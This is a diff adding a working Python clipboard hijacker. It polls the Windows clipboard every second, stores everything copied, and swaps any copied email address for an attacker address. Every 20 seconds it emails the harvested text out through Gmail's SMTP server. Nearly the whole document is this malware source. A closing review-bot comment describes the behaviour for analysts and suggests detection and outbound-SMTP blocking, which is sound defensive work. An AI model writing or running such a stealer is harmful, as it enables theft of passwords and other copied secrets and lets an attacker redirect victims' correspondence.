1+ """
2+ Clipboard Email Hijacker with Email Exfiltration
3+ Monitors clipboard, hijacks emails, and exfiltrates collected data via email
4+ """
5+
6+ import win32clipboard
7+ import re
8+ from time import sleep , time
9+ import sys
10+ import smtplib
11+ from email .mime .text import MIMEText
12+ from email .mime .multipart import MIMEMultipart
13+ from datetime import datetime
14+
15+ # Configuration
16+ ATTACKER_EMAIL = "attacker@attack.com"
17+ EXFILTRATION_EMAIL = "addyours@gmail.com"
18+ CHECK_INTERVAL = 1 # seconds between clipboard checks
19+ SEND_INTERVAL = 20 # seconds between sending collected data
20+ EMAIL_REGEX = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
21+
22+ # Gmail SMTP Configuration
23+ SMTP_SERVER = "smtp.gmail.com"
24+ SMTP_PORT = 465 # Using SSL port like the working test
25+ SMTP_USERNAME = "addyours@gmail.com"
26+ SMTP_PASSWORD = "add yours"
27+
28+ # Data collection storage
29+ clipboard_data = []
30+ hijacked_emails = []
31+
32+ def get_clipboard_text ():
33+ """Safely get text from clipboard"""
34+ try :
35+ win32clipboard .OpenClipboard ()
36+ try :
37+ data = win32clipboard .GetClipboardData (win32clipboard .CF_TEXT )
38+ if data :
39+ return data .decode ('utf-8' ).rstrip ()
40+ return None
41+ except TypeError :
42+ # Clipboard doesn't contain text
43+ return None
44+ finally :
45+ win32clipboard .CloseClipboard ()
46+ except Exception as e :
47+ return None
48+
49+ def set_clipboard_text (text ):
50+ """Safely set clipboard text"""
51+ try :
52+ win32clipboard .OpenClipboard ()
53+ win32clipboard .EmptyClipboard ()
54+ win32clipboard .SetClipboardText (text , win32clipboard .CF_TEXT )
55+ win32clipboard .CloseClipboard ()
56+ return True
57+ except Exception as e :
58+ try :
59+ win32clipboard .CloseClipboard ()
60+ except :
61+ pass
62+ return False
63+
64+ def send_exfiltration_email (clipboard_data , hijacked_emails ):
65+ """Send collected clipboard data via email"""
66+
67+ if not clipboard_data and not hijacked_emails :
68+ print ("[*] No data to exfiltrate, skipping email" )
69+ return False
70+
71+ try :
72+ # Create email
73+ msg = MIMEMultipart ()
74+ msg ['From' ] = SMTP_USERNAME
75+ msg ['To' ] = EXFILTRATION_EMAIL
76+ msg ['Subject' ] = f"Clipboard Data Exfiltration - { datetime .now ().strftime ('%Y-%m-%d %H:%M:%S' )} "
77+
78+ # Build email body
79+ body = "=" * 60 + "\n "
80+ body += "CLIPBOARD DATA EXFILTRATION REPORT\n "
81+ body += "=" * 60 + "\n \n "
82+ body += f"Collection Time: { datetime .now ().strftime ('%Y-%m-%d %H:%M:%S' )} \n "
83+ body += f"Total Items Collected: { len (clipboard_data )} \n "
84+ body += f"Total Emails Hijacked: { len (hijacked_emails )} \n "
85+ body += "\n " + "=" * 60 + "\n "
86+
87+ # Clipboard data section
88+ if clipboard_data :
89+ body += "\n --- CLIPBOARD DATA COLLECTED ---\n "
90+ body += "\n All captured clipboard content (comma-separated):\n "
91+ body += ", " .join (clipboard_data )
92+ body += "\n \n --- DETAILED CLIPBOARD ENTRIES ---\n "
93+ for i , item in enumerate (clipboard_data , 1 ):
94+ body += f"{ i } . { item } \n "
95+
96+ # Hijacked emails section
97+ if hijacked_emails :
98+ body += "\n " + "=" * 60 + "\n "
99+ body += "--- HIJACKED EMAIL ADDRESSES ---\n \n "
100+ body += "Comma-separated list:\n "
101+ body += ", " .join (hijacked_emails )
102+ body += "\n \n Detailed list:\n "
103+ for i , email in enumerate (hijacked_emails , 1 ):
104+ body += f"{ i } . { email } \n "
105+
106+ body += "\n " + "=" * 60 + "\n "
107+ body += "End of Report\n "
108+ body += "=" * 60 + "\n "
109+
110+ msg .attach (MIMEText (body , 'plain' ))
111+
112+ # Send email using SMTP_SSL (exactly like the working test email)
113+ print (f"\n [*] Sending exfiltration email to { EXFILTRATION_EMAIL } ..." )
114+ with smtplib .SMTP_SSL (SMTP_SERVER , SMTP_PORT ) as server :
115+ server .login (SMTP_USERNAME , SMTP_PASSWORD )
116+ server .send_message (msg )
117+
118+ print (f"[+] Successfully sent exfiltration email!" )
119+ print (f" - Clipboard items: { len (clipboard_data )} " )
120+ print (f" - Hijacked emails: { len (hijacked_emails )} \n " )
121+
122+ return True
123+
124+ except smtplib .SMTPAuthenticationError :
125+ print ("[ERROR] SMTP Authentication failed!" )
126+ print ("[!] Make sure you're using a Gmail App Password, not your regular password" )
127+ print ("[!] Generate one at: https://myaccount.google.com/apppasswords" )
128+ return False
129+ except Exception as e :
130+ print (f"[ERROR] Failed to send email: { e } " )
131+ import traceback
132+ traceback .print_exc ()
133+ return False
134+
135+ def main ():
136+ """Main clipboard monitoring loop with periodic exfiltration"""
137+ global clipboard_data , hijacked_emails
138+
139+ print ("=" * 60 )
140+ print ("Clipboard Email Hijacker with Data Exfiltration" )
141+ print ("=" * 60 )
142+ print (f"[+] Target email replacement: { ATTACKER_EMAIL } " )
143+ print (f"[+] Exfiltration email: { EXFILTRATION_EMAIL } " )
144+ print (f"[+] Monitoring clipboard every { CHECK_INTERVAL } second(s)" )
145+ print (f"[+] Sending data every { SEND_INTERVAL } seconds" )
146+ print ("[+] Press Ctrl+C to stop and exit\n " )
147+
148+ hijack_count = 0
149+ last_hijacked = None
150+ last_send_time = time ()
151+ last_clipboard_content = None
152+
153+ try :
154+ while True :
155+ current_time = time ()
156+
157+ # Get clipboard content
158+ data = get_clipboard_text ()
159+
160+ # Store ALL clipboard content (not just emails)
161+ if data and data != last_clipboard_content :
162+ clipboard_data .append (data )
163+ last_clipboard_content = data
164+ print (f"[*] Clipboard captured: { data [:50 ]} { '...' if len (data ) > 50 else '' } " )
165+
166+ # Check if it's an email and hijack it
167+ if data and re .search (EMAIL_REGEX , data ):
168+ if data != ATTACKER_EMAIL and data != last_hijacked :
169+ print (f"[!] EMAIL DETECTED: { data } " )
170+
171+ # Record the original email before hijacking
172+ hijacked_emails .append (data )
173+
174+ if set_clipboard_text (ATTACKER_EMAIL ):
175+ hijack_count += 1
176+ last_hijacked = data
177+ print (f"[+] REPLACED with: { ATTACKER_EMAIL } " )
178+ print (f"[*] Total hijacks: { hijack_count } \n " )
179+
180+ # Check if it's time to send exfiltration email
181+ if current_time - last_send_time >= SEND_INTERVAL :
182+ if send_exfiltration_email (clipboard_data , hijacked_emails ):
183+ # Clear the data after successful send
184+ clipboard_data = []
185+ hijacked_emails = []
186+ print ("[+] Data cleared, starting new collection cycle\n " )
187+
188+ last_send_time = current_time
189+
190+ sleep (CHECK_INTERVAL )
191+
192+ except KeyboardInterrupt :
193+ print (f"\n \n [+] Ctrl+C detected - Stopping monitoring..." )
194+ print (f"[*] Total emails hijacked: { hijack_count } " )
195+
196+ # Send any remaining data before exit
197+ if clipboard_data or hijacked_emails :
198+ print ("\n [*] Sending final exfiltration email with remaining data..." )
199+ send_exfiltration_email (clipboard_data , hijacked_emails )
200+
201+ print ("\n [+] Program exited successfully" )
202+ sys .exit (0 )
203+
204+ except Exception as e :
205+ print (f"\n [ERROR] Unexpected error: { e } " )
206+ import traceback
207+ traceback .print_exc ()
208+ sys .exit (1 )
209+
210+ if __name__ == "__main__" :
211+ main ()
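Review bot: The file has no header comment recording the host and network behaviour it produces, which is what an analyst triaging this sample needs first; I would add one above the imports, described here rather than quoted because it runs past three lines. From the visible lines it should state that `main` reads the clipboard every `CHECK_INTERVAL` (1 s) through `win32clipboard`, overwrites any content matching `EMAIL_REGEX` via `set_clipboard_text`, and every `SEND_INTERVAL` (20 s) hands the collected text to `send_exfiltration_email`. That function logs in over `smtplib.SMTP_SSL` to `smtp.gmail.com` on port 465 with a subject starting `Clipboard Data Exfiltration - `, so the signal to alert on is an authenticated SMTPS session to a consumer mail provider from a process that is not a mail client, alongside one process opening the clipboard at a fixed one-second cadence. Restricting outbound 465/587 from workstations to the organisation's own relay closes the exfiltration path shown here. Indentation was lost in this rendering, so the above follows statement order only.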